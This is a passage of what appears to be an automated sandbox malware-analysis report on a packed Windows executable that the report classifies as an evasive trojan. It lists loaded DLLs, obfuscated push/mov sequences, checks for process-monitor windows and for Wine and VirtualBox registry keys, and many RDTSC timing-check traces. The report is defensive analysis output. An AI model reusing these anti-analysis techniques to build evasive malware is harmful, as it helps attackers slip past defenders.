              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0101AF8C2_2_0101AF8C
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_010236422_2_01023642
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0107EE5C2_2_0107EE5C
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0101E6EE2_2_0101E6EE
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00C74A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: yqttidiy ZLIB complexity 0.9948113579080026
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C93A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,2_2_00C93A50
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C8CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,2_2_00C8CAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\L5FVYZN0.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeReversingLabs: Detection: 44%
              Source: file.exeVirustotal: Detection: 54%
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1731584 > 1048576
              Source: file.exeStatic PE information: Raw size of yqttidiy is bigger than: 0x100000 < 0x18cc00

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 2.2.file.exe.c70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yqttidiy:EW;gxgxfcij:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yqttidiy:EW;gxgxfcij:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C96390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00C96390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1b6298 should be: 0x1aebf4
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: yqttidiy
              Source: file.exeStatic PE information: section name: gxgxfcij
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01052115 push edx; mov dword ptr [esp], 5FDDA100h2_2_01052423
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0109E118 push 6A4BEBBBh; mov dword ptr [esp], esi2_2_0109E1A8
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0109A13A push 003C2794h; mov dword ptr [esp], edi2_2_0109A18A
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0107F932 push edx; mov dword ptr [esp], edi2_2_0107FAB4
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_010DA140 push ebx; mov dword ptr [esp], edi2_2_010DA1D4
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C97895 push ecx; ret 2_2_00C978A8
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_010ED16A push 1CAEF664h; mov dword ptr [esp], edi2_2_010ED236
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01017966 push ecx; mov dword ptr [esp], eax2_2_0101796E
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01017966 push 303B26D2h; mov dword ptr [esp], edx2_2_0101798F
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01017966 push eax; mov dword ptr [esp], 5FF5292Eh2_2_01017ADF
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01017966 push 51B6A0F4h; mov dword ptr [esp], eax2_2_01017B0B
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01017966 push ecx; mov dword ptr [esp], 66F666ADh2_2_01017B77
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01017966 push 2EA30D36h; mov dword ptr [esp], edi2_2_01017B97
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01017966 push ecx; mov dword ptr [esp], esi2_2_01017BE5
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01017966 push ebx; mov dword ptr [esp], edi2_2_01017C3E
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01017966 push 33D27FF9h; mov dword ptr [esp], ebx2_2_01017CB7
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01017966 push esi; mov dword ptr [esp], edx2_2_01017CE1
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01017966 push 05A7A7CFh; mov dword ptr [esp], eax2_2_01017D53
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01017966 push edi; mov dword ptr [esp], 5EF61603h2_2_01017E05
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01017966 push eax; mov dword ptr [esp], esi2_2_01017E37
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01017966 push 78DC3100h; mov dword ptr [esp], edi2_2_01017E41
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01017966 push eax; mov dword ptr [esp], 43409891h2_2_01017ED2
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01017966 push 2A3C58C0h; mov dword ptr [esp], edi2_2_01017F13
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01017966 push 25293D45h; mov dword ptr [esp], ecx2_2_01017F33
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01017966 push 2DE4F1DAh; mov dword ptr [esp], edx2_2_01017F3E
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01017966 push esi; mov dword ptr [esp], 5BE559ADh2_2_01017F42
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01017966 push 572EF5B9h; mov dword ptr [esp], ebp2_2_01017F8A
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01017966 push 4CF0A8A0h; mov dword ptr [esp], eax2_2_01017FA8
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01017966 push ebx; mov dword ptr [esp], ecx2_2_01017FD6
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01017966 push 36A6A924h; mov dword ptr [esp], edi2_2_01018085
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01017966 push edx; mov dword ptr [esp], eax2_2_01018115
              Source: file.exeStatic PE information: section name: yqttidiy entropy: 7.953903563847724

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C96390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00C96390

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_2-25887
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0110 second address: EC0125 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0125 second address: EC012F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FAE58F85636h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC012F second address: EC0133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBF967 second address: EBF96B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102834A second address: 1028350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1028350 second address: 102835E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FAE58F8563Ah 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102835E second address: 1028386 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007FAE58F85876h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007FAE58F8587Ch 0x00000016 pushad 0x00000017 push eax 0x00000018 pop eax 0x00000019 jns 00007FAE58F85876h 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1028386 second address: 1028392 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAE58F8563Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10277B2 second address: 10277C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAE58F8587Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B6C8 second address: 102B70F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FAE58F85636h 0x0000000a popad 0x0000000b jnp 00007FAE58F85641h 0x00000011 jmp 00007FAE58F8563Bh 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007FAE58F85644h 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FAE58F8563Dh 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B70F second address: 102B715 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B715 second address: 102B72D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007FAE58F85636h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007FAE58F85636h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B72D second address: 102B737 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAE58F85876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B737 second address: 102B769 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FAE58F8563Fh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B769 second address: 102B76F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B76F second address: 102B773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B773 second address: 102B79A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAE58F85876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d clc 0x0000000e mov dword ptr [ebp+122D259Dh], edi 0x00000014 lea ebx, dword ptr [ebp+1243F524h] 0x0000001a mov esi, dword ptr [ebp+122D1C48h] 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 pop eax 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B79A second address: 102B79E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B79E second address: 102B7A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B7A4 second address: 102B7AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FAE58F85636h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B7AF second address: 102B7CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 pushad 0x0000000a jmp 00007FAE58F85881h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B853 second address: 102B857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B857 second address: 102B85D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B85D second address: 102B862 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B862 second address: 102B868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B868 second address: 102B8D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 78965242h 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FAE58F85638h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 movsx esi, ax 0x0000002b push 00000003h 0x0000002d jmp 00007FAE58F85648h 0x00000032 push 00000000h 0x00000034 mov dx, 3A45h 0x00000038 push 00000003h 0x0000003a mov cl, dl 0x0000003c push 4B13A94Eh 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FAE58F85641h 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B8D2 second address: 102B90B instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAE58F8587Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 74EC56B2h 0x00000011 mov ecx, dword ptr [ebp+122D3539h] 0x00000017 lea ebx, dword ptr [ebp+1243F52Dh] 0x0000001d mov edi, dword ptr [ebp+122D3609h] 0x00000023 xor dword ptr [ebp+122D1C23h], eax 0x00000029 push eax 0x0000002a pushad 0x0000002b je 00007FAE58F8587Ch 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B972 second address: 102BA0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edi 0x00000007 jmp 00007FAE58F8563Dh 0x0000000c pop edi 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FAE58F85638h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D2597h], edi 0x0000002e cmc 0x0000002f push 00000000h 0x00000031 mov esi, dword ptr [ebp+122D382Dh] 0x00000037 push edx 0x00000038 pop esi 0x00000039 call 00007FAE58F85639h 0x0000003e pushad 0x0000003f jl 00007FAE58F8564Eh 0x00000045 jmp 00007FAE58F85648h 0x0000004a push eax 0x0000004b jnc 00007FAE58F85636h 0x00000051 pop eax 0x00000052 popad 0x00000053 push eax 0x00000054 jmp 00007FAE58F8563Eh 0x00000059 mov eax, dword ptr [esp+04h] 0x0000005d push eax 0x0000005e push edx 0x0000005f jc 00007FAE58F8563Ch 0x00000065 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BA0C second address: 102BA30 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jp 00007FAE58F85882h 0x00000010 jnl 00007FAE58F8587Ch 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a pushad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BA30 second address: 102BA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FAE58F85642h 0x0000000f popad 0x00000010 popad 0x00000011 pop eax 0x00000012 or esi, dword ptr [ebp+122D3721h] 0x00000018 mov esi, eax 0x0000001a push 00000003h 0x0000001c jmp 00007FAE58F8563Bh 0x00000021 push 00000000h 0x00000023 movsx ecx, si 0x00000026 push 00000003h 0x00000028 mov ecx, dword ptr [ebp+122D35C5h] 0x0000002e push D9B4D386h 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 pushad 0x00000037 popad 0x00000038 pop eax 0x00000039 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BA7C second address: 102BA82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BA82 second address: 102BA86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10490A6 second address: 10490AB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049209 second address: 1049213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049213 second address: 104921E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104921E second address: 104922E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FAE58F85636h 0x0000000a pop edx 0x0000000b popad 0x0000000c push ebx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104922E second address: 1049234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049234 second address: 104923A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104938B second address: 1049394 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049394 second address: 104939A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104939A second address: 104939F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10499EF second address: 10499F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10499F5 second address: 10499FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FAE58F85876h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049BAB second address: 1049BB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FAE58F85636h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049BB5 second address: 1049BD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FAE58F85888h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104A2A2 second address: 104A2A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1040985 second address: 1040989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1040989 second address: 1040993 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAE58F85636h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1040993 second address: 1040999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104AA5B second address: 104AA65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FAE58F85636h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104AA65 second address: 104AA69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104AA69 second address: 104AA6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104AA6F second address: 104AA75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104AA75 second address: 104AAAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85645h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b jmp 00007FAE58F85645h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104AD61 second address: 104AD69 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104FC7E second address: 104FC82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
